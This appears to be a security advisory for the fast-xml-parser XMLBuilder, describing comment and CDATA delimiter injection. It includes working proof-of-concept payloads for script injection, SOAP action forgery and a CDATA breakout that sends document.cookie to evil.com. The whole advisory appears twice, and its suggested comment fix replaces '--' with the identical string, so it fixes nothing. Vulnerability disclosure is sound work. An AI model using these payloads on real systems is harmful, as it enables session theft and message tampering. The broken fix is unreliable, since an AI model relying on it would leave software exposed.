About vulnerability

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters

Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

• CVE-2023-26920: Prototype pollution (parser)
• CVE-2023-34104: ReDoS (parser)
• CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder
• CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
// ...
if (key === this.options.commentPropName) {
return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
}
// ...
if (key === this.options.cdataPropName) {
return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
}
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept

Test 1: Comment Injection (XSS in SVG/HTML context)

import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
commentPropName: "#comment",
format: true,
suppressEmptyNode: true
});

const xml = {
root: {
"#comment": "--><script>alert('XSS')</script><!--",
data: "legitimate content"
}
};

console.log(builder.build(xml));

Output:

<root>
<!----><script>alert('XSS')</script><!---->
<data>legitimate content</data>
</root>

Test 2: CDATA Injection (RSS feed)

const builder = new XMLBuilder({
cdataPropName: "#cdata",
format: true,
suppressEmptyNode: true
});

const rss = {
rss: { channel: { item: {
title: "Article",
description: {
"#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
}
&#125;&#125;}
};

console.log(builder.build(rss));

Output:

<rss>
<channel>
<item>
<title>Article</title>
<description>
<![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
</description>
</item>
</channel>
</rss>

Test 3: SOAP Message Injection

const builder = new XMLBuilder({
commentPropName: "#comment",
format: true
});

const soap = {
"soap:Envelope": {
"soap:Body": {
"#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
Action: "getBalance",
UserId: "12345"
}
}
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
<soap:Body>
<!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
<Action>getBalance</Action>
<UserId>12345</UserId>
</soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
Injection successful: true

4. Round-trip test:
Injection present: true

5. SOAP MESSAGE INJECTION:
Contains injected Action: true

Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
2. SOAP injection: Modify SOAP message structure by injecting XML elements
3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
const safeVal = String(val).replace(/--/g, '--');
return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}

Affected product:

Node.js , React , astro , b4a , babel-preset-expo , bare-fs , bare-stream , bottom-tabs , cli , db0 , devtools , drawer , drizzle-orm , expo , expo-asset , expo-constants , expo-file-system , expo-image , expo-linking , expo-modules-jsi , expo-router , expo-sqlite , expo-symbols , expo-widgets , fast-xml-parser , masked-view , metro-runtime , mongoose , native-stack , nitro , nuxt , op-sqlite , platform-ios , sharp , streamx , tar-fs , tar-stream , teex , text-decoder , unstorage , vector-icons , vite , vite-dev-rpc , vite-hot-client , vite-plugin-checker , vite-plugin-inspect , vite-plugin-vue , vite-plugin-vue-inspector , vite-plugin-vue-tracer , vitefu

Affected packages:

fast-xml-parser (+365 more)

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters

Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

• CVE-2023-26920: Prototype pollution (parser)
• CVE-2023-34104: ReDoS (parser)
• CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder
• CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
// ...
if (key === this.options.commentPropName) {
return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
}
// ...
if (key === this.options.cdataPropName) {
return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
}
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept

Test 1: Comment Injection (XSS in SVG/HTML context)

import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
commentPropName: "#comment",
format: true,
suppressEmptyNode: true
});

const xml = {
root: {
"#comment": "--><script>alert('XSS')</script><!--",
data: "legitimate content"
}
};

console.log(builder.build(xml));

Output:

<root>
<!----><script>alert('XSS')</script><!---->
<data>legitimate content</data>
</root>

Test 2: CDATA Injection (RSS feed)

const builder = new XMLBuilder({
cdataPropName: "#cdata",
format: true,
suppressEmptyNode: true
});

const rss = {
rss: { channel: { item: {
title: "Article",
description: {
"#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
}
&#125;&#125;}
};

console.log(builder.build(rss));

Output:

<rss>
<channel>
<item>
<title>Article</title>
<description>
<![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
</description>
</item>
</channel>
</rss>

Test 3: SOAP Message Injection

const builder = new XMLBuilder({
commentPropName: "#comment",
format: true
});

const soap = {
"soap:Envelope": {
"soap:Body": {
"#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
Action: "getBalance",
UserId: "12345"
}
}
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
<soap:Body>
<!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
<Action>getBalance</Action>
<UserId>12345</UserId>
</soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
Injection successful: true

4. Round-trip test:
Injection present: true

5. SOAP MESSAGE INJECTION:
Contains injected Action: true

Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
2. SOAP injection: Modify SOAP message structure by injecting XML elements
3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
const safeVal = String(val).replace(/--/g, '--');
return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}